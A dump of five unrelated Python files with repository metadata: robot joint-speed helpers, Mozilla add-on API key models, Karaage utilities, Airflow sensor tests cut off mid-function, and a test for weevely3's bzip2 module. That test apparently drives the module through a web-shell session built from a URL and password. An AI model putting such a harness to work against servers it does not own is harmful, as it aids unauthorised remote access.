def get_max_degrees_per_second(self, jointName):
limits = self.env.motion.getLimits(jointName);
minAngle = limits[0][0]
maxAngle = limits[0][1]
maxChange = limits[0][2] # in rad.s-1
#self.log("maxChange: " + str(maxChange) + " for " + jointName)
return math.degrees(maxChange)
def get_fraction_max_speed(self, jointName, desiredPositionInDegrees, executionTimeInSeconds):
# current position in degrees
useSensors = False;
currentPositionInDegrees = math.degrees(self.env.motion.getAngles(jointName, useSensors)[0]);
#self.log("pos in deg: " + str(currentPositionInDegrees))
# distance
distanceInDegrees = abs(currentPositionInDegrees - desiredPositionInDegrees)
#self.log("distance: " + str(distanceInDegrees))
# max speed
maxDegreesPerSecond = self.get_max_degrees_per_second(jointName)
# fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
if fractionOfMaxSpeed > maxDegreesPerSecond:
return maxDegreesPerSecond
return fractionOfMaxSpeed
###################################
# development
###################################
def init_modules_for_development(pathToCore):
import sys
sys.path.append(pathToCore)
import fluentnao.core.arms
import fluentnao.core.elbows
import fluentnao.core.feet
import fluentnao.core.hands
import fluentnao.core.head
import fluentnao.core.joints
import fluentnao.core.legs
import fluentnao.core.wrists
import fluentnao.core.leds
import fluentnao.core.audio
import fluentnao.core.naoscript
reload(fluentnao.core.arms)
reload(fluentnao.core.joints)
reload(fluentnao.core.hands)
reload(fluentnao.core.elbows)
reload(fluentnao.core.wrists)
reload(fluentnao.core.legs)
reload(fluentnao.core.head)
reload(fluentnao.core.feet)
reload(fluentnao.core.leds)
reload(fluentnao.core.audio)
reload(fluentnao.core.naoscript)
|
davesnowdon/nao-recorder
|
src/main/python/fluentnao/nao.py
|
Python
|
gpl-2.0
| 10,366
| 0.006946
|
import binascii
import os
import random
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
from aesfield.field import AESField
from olympia.amo.fields import PositiveAutoField
from olympia.amo.models import ModelBase
from olympia.users.models import UserProfile
# These are identifiers for the type of API keys that can be stored
# in our database.
SYMMETRIC_JWT_TYPE = 1
API_KEY_TYPES = [
SYMMETRIC_JWT_TYPE,
]
@python_2_unicode_compatible
class APIKey(ModelBase):
"""
A developer's key/secret pair to access the API.
"""
id = PositiveAutoField(primary_key=True)
user = models.ForeignKey(UserProfile, related_name='api_keys')
# A user can only have one active key at the same time, it's enforced by
# a unique db constraint. Since we keep old inactive keys though, nulls
# need to be allowed (and we need to always set is_active=None instead of
# is_active=False when revoking keys).
is_active = models.NullBooleanField(default=True)
type = models.PositiveIntegerField(
choices=dict(zip(API_KEY_TYPES, API_KEY_TYPES)).items(), default=0)
key = models.CharField(max_length=255, db_index=True, unique=True)
# TODO: use RSA public keys instead? If we were to use JWT RSA keys
# then we'd only need to store the public key.
secret = AESField(aes_key='api_key:secret', aes_prefix=b'aes:')
class Meta:
db_table = 'api_key'
unique_together = (('user', 'is_active'),)
def __str__(self):
return (
u'<{cls} user={user}, type={type}, key={key} secret=...>'
.format(cls=self.__class__.__name__, key=self.key,
type=self.type, user=self.user))
@classmethod
def get_jwt_key(cls, **kwargs):
"""
Return a single active APIKey instance for a given user or key.
"""
kwargs['is_active'] = True
return cls.objects.get(type=SYMMETRIC_JWT_TYPE, **kwargs)
@classmethod
def new_jwt_credentials(cls, user):
"""
Generates a new key/secret pair suitable for symmetric JWT signing.
This method must be run within a db transaction.
Returns an instance of APIKey.
"""
key = cls.get_unique_key('user:{}:'.format(user.pk))
return cls.objects.create(
key=key, secret=cls.generate_secret(32),
type=SYMMETRIC_JWT_TYPE, user=user, is_active=True)
@classmethod
def get_unique_key(cls, prefix, try_count=1, max_tries=1000):
if try_count >= max_tries:
raise RuntimeError(
'a unique API key could not be found after {} tries'
.format(max_tries))
key = '{}{}'.format(prefix, random.randint(0, 999))
if cls.objects.filter(key=key).exists():
return cls.get_unique_key(prefix, try_count=try_count + 1,
max_tries=max_tries)
return key
@staticmethod
def generate_secret(byte_length):
"""
Return a true random ascii string containing byte_length of randomness.
The resulting key is suitable for cryptography.
The key will be hex encoded which means it will be twice as long
as byte_length, i.e. 40 random bytes yields an 80 byte string.
byte_length must be at least 32.
"""
if byte_length < 32: # at least 256 bit
raise ValueError(
'{} is too short; secrets must be longer than 32 bytes'
.format(byte_length))
return force_text(binascii.b2a_hex(os.urandom(byte_length)))
|
aviarypl/mozilla-l10n-addons-server
|
src/olympia/api/models.py
|
Python
|
bsd-3-clause
| 3,638
| 0
|
from tests.base_test import BaseTest
from tests import config
from core import modules
from core.sessions import SessionURL
from testfixtures import log_capture
from core import messages
import logging
import os
import subprocess
class FileBzip(BaseTest):
# Create and bzip2 binary files for the test
binstring = [
b'\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1',
b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00'
]
uncompressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1')
]
compressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0.bz2'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1.bz2')
]
def setUp(self):
session = SessionURL(self.url, self.password, volatile = True)
modules.load_modules(session)
subprocess.check_output("""
BASE_FOLDER="{config.base_folder}/test_file_bzip2/"
rm -rf "$BASE_FOLDER"
mkdir -p "$BASE_FOLDER/"
echo -n '\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1' > "$BASE_FOLDER/binfile0"
echo -n '\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00' > "$BASE_FOLDER/binfile1"
bzip2 "$BASE_FOLDER/binfile0"
bzip2 "$BASE_FOLDER/binfile1"
chown www-data: -R "$BASE_FOLDER/"
""".format(
config = config
), shell=True)
self.run_argv = modules.loaded['file_bzip2'].run_argv
def test_compress_decompress(self):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[0]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Recompress it keeping the original file
self.assertTrue(self.run_argv([self.uncompressed[0], '--keep']))
# Check the existance of the original file and remove it
subprocess.check_call('stat -c %%a "%s"' % self.uncompressed[0], shell=True)
subprocess.check_call('rm "%s"' % self.uncompressed[0], shell=True)
#Do the same check
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
def test_compress_decompress_multiple(self):
for index in range(0, len(self.compressed)):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[index]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
@log_capture()
def test_already_exists(self, log_captured):
# Decompress keeping it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0], '--keep']));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Do it again and trigger that the file decompressed already exists
self.assertIsNone(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping decompressing" % self.uncompressed[0])
# Compress and trigger that the file compressed already exists
self.assertIsNone(self.run_argv([self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping compressing" % self.compressed[0])
@log_capture()
def test_wrong_ext(self, log_captured):
# Decompress it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Decompress the decompressed, wrong ext
self.assertIsNone(self.run_argv(["--decompress", self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"Unknown suffix, skipping decompressing")
@log_capture()
def test_unexistant(self, log_captured):
# Decompress it and check test file
self.assertIsNone(self.run_argv(["--decompress", 'bogus']));
self.assertEqual(log_captured.records[-1].msg,
"Skipping file '%s', check existance and permission" % 'bogus')
|
epinna/weevely3
|
tests/test_file_bzip2.py
|
Python
|
gpl-3.0
| 5,554
| 0.009903
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import datetime
import importlib
import warnings
import django
import six
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import render
from django.urls import reverse
from karaage.common.forms import CommentForm
from karaage.common.models import ADDITION, CHANGE, COMMENT, DELETION, LogEntry
from karaage.middleware.threadlocals import get_current_user
from karaage.plugins import BasePlugin
def get_date_range(request, default_start=None, default_end=None):
if default_start is None:
default_start = datetime.date.today() - datetime.timedelta(days=90)
if default_end is None:
default_end = datetime.date.today()
today = datetime.date.today()
if 'start' in request.GET:
try:
years, months, days = request.GET['start'].split('-')
start = datetime.datetime(int(years), int(months), int(days))
start = start.date()
except ValueError:
start = today - datetime.timedelta(days=90)
else:
start = default_start
if 'end' in request.GET:
try:
years, months, days = request.GET['end'].split('-')
end = datetime.datetime(int(years), int(months), int(days))
end = end.date()
except ValueError:
end = today
else:
end = default_end
return start, end
def get_current_person():
user = get_current_user()
if user is None:
return None
if not user.is_authenticated:
return None
return user
class log():
def __init__(self, user, obj, flag, message):
warnings.warn("Calling karaage.common.log directly has been"
" deprecated. You should use the API "
"log.(add|change|field_change|delete|comment)",
DeprecationWarning)
LogEntry.objects.log_object(obj, flag, message, user)
@classmethod
def add(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, ADDITION, message, user)
@classmethod
def change(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, CHANGE, message, user)
@classmethod
def field_change(cls, obj, user=None, field=None, new_value=None):
return LogEntry.objects.log_object(
obj, CHANGE, 'Changed %s to %s' % (field, new_value), user)
@classmethod
def delete(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, DELETION, message, user)
@classmethod
def comment(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, COMMENT, message, user)
def new_random_token():
import random
from hashlib import sha1
# Use the system (hardware-based) random number generator if it exists.
if hasattr(random, 'SystemRandom'):
randrange = random.SystemRandom().randrange
else:
randrange = random.randrange
max_key = 18446744073709551616 # 2 << 63
string = six.u("%s%s") % (randrange(0, max_key), settings.SECRET_KEY)
return sha1(string.encode("ascii")).hexdigest()
def log_list(request, breadcrumbs, obj):
result = QueryDict("", mutable=True)
result['content_type'] = ContentType.objects.get_for_model(obj).pk
result['object_id'] = obj.pk
url = reverse('kg_log_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
def add_comment(request, breadcrumbs, obj):
assert obj is not None
assert obj.pk is not None
form = CommentForm(
data=request.POST or None, obj=obj,
request=request, instance=None)
if request.method == 'POST':
form.save()
return HttpResponseRedirect(obj.get_absolute_url())
return render(
template_name='karaage/common/add_comment.html',
context={
'form': form, 'obj': obj,
'breadcrumbs': breadcrumbs,
},
request=request)
def is_admin(request):
if settings.ADMIN_IGNORED:
return False
if not request.user.is_authenticated:
return False
return request.user.is_admin
def get_app_modules(name):
if django.VERSION < (1, 7):
for app in settings.INSTALLED_APPS:
try:
module_name = app + "." + name
module = importlib.import_module(module_name)
yield module
except ImportError:
pass
else:
from django.apps import apps
for config in apps.get_app_configs():
if isinstance(config, BasePlugin):
module_name = config.name + "." + name
module = importlib.import_module(module_name)
yield module
def get_urls(name):
for module in get_app_modules("urls"):
urls = getattr(module, name, None)
if urls is not None:
yield urls
|
Karaage-Cluster/karaage
|
karaage/common/__init__.py
|
Python
|
gpl-3.0
| 5,700
| 0
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from datetime import time, timedelta
import pytest
from airflow import exceptions, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout
from airflow.models import DagBag, DagRun, TaskInstance
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskMarker, ExternalTaskSensor
from airflow.sensors.time_sensor import TimeSensor
from airflow.serialization.serialized_objects import SerializedBaseOperator
from airflow.utils.session import provide_session
from airflow.utils.state import DagRunState, State, TaskInstanceState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_test_dag'
TEST_TASK_ID = 'time_sensor_check'
TEST_TASK_ID_ALTERNATE = 'time_sensor_check_alternate'
DEV_NULL = '/dev/null'
@pytest.fixture(autouse=True)
def clean_db():
clear_db_runs()
class TestExternalTaskSensor(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
def test_time_sensor(self, task_id=TEST_TASK_ID):
op = TimeSensor(task_id=task_id, target_time=time(0), dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_multiple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_catch_overlap_allowed_failed_state(self):
with pytest.raises(AirflowException):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=[State.SUCCESS],
failed_states=[State.SUCCESS],
dag=self.dag,
)
def test_external_task_sensor_wrong_failed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["invalid_state"],
dag=self.dag,
)
def test_external_task_sensor_failed_states(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["failed"],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_failed_states_as_success(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks [\'time_sensor_check\']'
' in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check'] in DAG "
"unit_test_dag failed."
)
def test_external_task_sensor_failed_states_as_success_mulitple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks '
'[\'time_sensor_check\', \'time_sensor_check_alternate\'] '
'in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check', 'time_sensor_check_alternate'] in DAG "
"unit_test_dag failed."
)
def test_external_dag_sensor(self):
other_dag = DAG('other_dag', default_args=self.args, end_date=DEFAULT_DATE, schedule_interval='@once')
other_dag.create_dagrun(
run_id='test', start_date=DEFAULT_DATE, execution_date=DEFAULT_DATE, state=State.SUCCESS
)
op = ExternalTaskSensor(
task_id='test_external_dag_sensor_check',
external_dag_id='other_dag',
external_task_id=None,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_execution_dates(self):
bash_command_code = """
{% set s=logical_date.time().second %}
echo "second is {{ s }}"
if [[ $(( {{ s }} % 60 )) == 1 ]]
then
exit 1
fi
exit 0
"""
dag_external_id = TEST_DAG_ID + '_external'
dag_external = DAG(dag_external_id, default_args=self.args, schedule_interval=timedelta(seconds=1))
task_external_with_failure = BashOperator(
task_id="task_external_with_failure", bash_command=bash_command_code, retries=0, dag=dag_external
)
task_external_without_failure = DummyOperator(
task_id="task_external_without_failure", retries=0, dag=dag_external
)
task_external_without_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
session = settings.Session()
TI = TaskInstance
try:
task_external_with_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
# The test_with_failure task is excepted to fail
# once per minute (the run on the first second of
# each minute).
except Exception as e:
failed_tis = (
session.query(TI)
.filter(
TI.dag_id == dag_external_id,
TI.state == State.FAILED,
TI.execution_date == DEFAULT_DATE + timedelta(seconds=1),
)
.all()
)
if len(failed_tis) == 1 and failed_tis[0].task_id == 'task_external_with_failure':
pass
else:
raise e
dag_id = TEST_DAG_ID
dag = DAG(dag_id, default_args=self.args, schedule_interval=timedelta(minutes=1))
task_without_failure = ExternalTaskSensor(
task_id='task_without_failure',
external_dag_id=dag_external_id,
external_task_id='task_external_without_failure',
execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
allowed_states=['success'],
retries=0,
timeout=1,
poke_interval=1,
dag=dag,
)
task_with_failure = ExternalTaskSensor(
task_id='task_with_failure',
external_dag_id=dag_external_id,
external_task_id='task_external_with_failure',
execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
allowed_states=['success'],
retries=0,
timeout=1,
poke_interval=1,
dag=dag,
)
task_without_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
with pytest.raises(AirflowSensorTimeout):
task_with_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_delta(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_delta=timedelta(0),
allowed_states=['success'],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn(self):
self.test_time_sensor()
# check that the execution_fn works
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta_1',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=lambda dt: dt + timedelta(0),
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
# double check that the execution is being called by failing the test
op2 = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta_2',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=lambda dt: dt + timedelta(days=1),
allowed_states=['success'],
timeout=1,
poke_interval=1,
dag=self.dag,
)
with pytest.raises(exceptions.AirflowSensorTimeout):
op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_args(self):
"""Check this task sensor passes multiple args with full context. If no failure, means clean run."""
self.test_time_sensor()
def my_func(dt, context):
assert context['logical_date'] == dt
return dt + timedelta(0)
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_multiple_arg_fn',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=my_func,
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_kwargs(self):
"""Check this task sensor passes multiple args with full context. If no failure, means clean run."""
self.test_time_sensor()
def my_func(dt, ds_nodash, tomorrow_ds_nodash):
assert ds_nodash == dt.strftime("%Y%m%d")
assert tomorrow_ds_nodash == (dt + timedelta(days=1)).strftime("%Y%m%d")
return dt + timedelta(0)
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_fn_kwargs',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=my_func,
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_error_delta_and_fn(self):
self.test_time_sensor()
# Test that providing execution_delta and a function raises an error
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_delta=timedelta(0),
execution_date_fn=lambda dt: dt,
allowed_states=['success'],
dag=self.dag,
)
def test_external_task_sensor_error_task_id_and_task_ids(self):
self.test_time_sensor()
# Test that providing execution_delta and a function raises an error
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_task_id_and_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
external_task_ids=[TEST_TASK_ID],
allowed_states=['success'],
dag=self.dag,
)
def test_catch_duplicate_task_ids(self):
self.test_time_sensor()
# Test By passing same task_id multiple times
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_duplicate_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID],
allowed_states=['success'],
dag=self.dag,
)
def test_catch_invalid_allowed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_1',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=['invalid_state'],
dag=self.dag,
)
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_2',
external_dag_id=TEST_DAG_ID,
external_task_id=None,
allowed_states=['invalid_state'],
dag=self.dag,
)
def test_external_task_sensor_waits_for_task_check_existence(self):
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id="example_bash_operator",
external_task_id="non-existing-task",
check_existence=True,
dag=self.dag,
)
with pytest.raises(AirflowException):
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_waits_for_dag_check_existence(self):
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id="non-existing-dag",
external_task_id=None,
check_existence=True,
dag=self.dag,
)
with pytest.raises(AirflowException):
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_templated(dag_maker):
with dag_maker():
ExternalTaskSensor(
task_id='templated_task',
external_dag_id='dag_{{ ds }}',
external_task_id='task_{{ ds }}',
)
dagrun = dag_maker.create_dagrun(run_type=DagRunType.SCHEDULED, execution_date=DEFAULT_DATE)
(instance,) = dagrun.task_instances
instance.render_templates()
assert instance.task.external_dag_id == f"dag_{DEFAULT_DATE.date()}"
assert instance.task.external_task_id == f"task_{DEFAULT_DATE.date()}"
class TestExternalTaskMarker(unittest.TestCase):
def test_serialized_fields(self):
assert {"recursion_depth"}.issubset(ExternalTaskMarker.get_serialized_fields())
def test_serialized_external_task_marker(self):
dag = DAG('test_serialized_external_task_marker', start_date=DEFAULT_DATE)
task = ExternalTaskMarker(
task_id="parent_task",
external_dag_id="external_task_marker_child",
external_task_id="child_task1",
dag=dag,
)
serialized_op = SerializedBaseOperator.serialize_operator(task)
deserialized_op = SerializedBaseOperator.deserialize_operator(serialized_op)
assert deserialized_op.task_type == 'ExternalTaskMarker'
assert getattr(deserialized_op, 'external_dag_id') == 'external_task_marker_child'
assert getattr(deserialized_op, 'external_task_id') == 'child_task1'
@pytest.fixture
def dag_bag_ext():
"""
Create a DagBag with DAGs looking like this. The dotted lines represent external dependencies
set up using ExternalTaskMarker and ExternalTaskSensor.
dag_0: task_a_0 >> task_b_0
|
|
dag_1: ---> task_a_1 >> task_b_1
|
|
dag_2: ---> task_a_2 >> task_b_2
|
|
dag_3: ---> task_a_3 >> task_b_3
"""
clear_db_runs()
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
dag_0 = DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_0 = DummyOperator(task_id="task_a_0", dag=dag_0)
task_b_0 = ExternalTaskMarker(
task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3, dag=dag_0
)
task_a_0 >> task_b_0
dag_1 = DAG("dag_1", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_1 = ExternalTaskSensor(
task_id="task_a_1", external_dag_id=dag_0.dag_id, external_task_id=task_b_0.task_id, dag=dag_1
)
task_b_1 = ExternalTaskMarker(
task_id="task_b_1", external_dag_id="dag_2", external_task_id="task_a_2", recursion_depth=2, dag=dag_1
)
task_a_1 >> task_b_1
dag_2 = DAG("dag_2", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_2 = ExternalTaskSensor(
task_id="task_a_2", external_dag_id=dag_1.dag_id, external_task_id=task_b_1.task_id, dag=dag_2
)
task_b_2 = ExternalTaskMarker(
task_id="task_b_2", external_dag_id="dag_3", external_task_id="task_a_3", recursion_depth=1, dag=dag_2
)
task_a_2 >> task_b_2
dag_3 = DAG("dag_3", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_3 = ExternalTaskSensor(
task_id="task_a_3", external_dag_id=dag_2.dag_id, external_task_id=task_b_2.task_id, dag=dag_3
)
task_b_3 = DummyOperator(task_id="task_b_3", dag=dag_3)
task_a_3 >> task_b_3
for dag in [dag_0, dag_1, dag_2, dag_3]:
dag_bag.bag_dag(dag=dag, root_dag=dag)
yield dag_bag
clear_db_runs()
@pytest.fixture
def dag_bag_parent_child():
"""
Create a DagBag with two DAGs looking like this. task_1 of child_dag_1 on day 1 depends on
task_0 of parent_dag_0 on day 1. Therefore, when task_0 of parent_dag_0 on day 1 and day 2
are cleared, parent_dag_0 DagRuns need to be set to running on both days, but child_dag_1
only needs to be set to running on day 1.
day 1 day 2
parent_dag_0 task_0 task_0
|
|
v
child_dag_1 task_1 task_1
"""
clear_db_runs()
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
day_1 = DEFAULT_DATE
with DAG("parent_dag_0", start_date=day_1, schedule_interval=None) as dag_0:
task_0 = ExternalTaskMarker(
task_id="task_0",
external_dag_id="child_dag_1",
external_task_id="task_1",
execution_date=day_1.isoformat(),
recursion_depth=3,
)
with DAG("child_dag_1", start_date=day_1, schedule_interval=None) as dag_1:
ExternalTaskSensor(
task_id="task_1",
external_dag_id=dag_0.dag_id,
external_task_id=task_0.task_id,
execution_date_fn=lambda logical_date: day_1 if logical_date == day_1 else [],
mode='reschedule',
)
for dag in [dag_0, dag_1]:
dag_bag.bag_dag(dag=dag, root_dag=dag)
yield dag_bag
clear_db_runs()
@provide_session
def run_tasks(dag_bag, execution_date=DEFAULT_DATE, session=None):
"""
Run all tasks in the DAGs in the given dag_bag. Return the TaskInstance objects as a dict
keyed by task_id.
"""
tis = {}
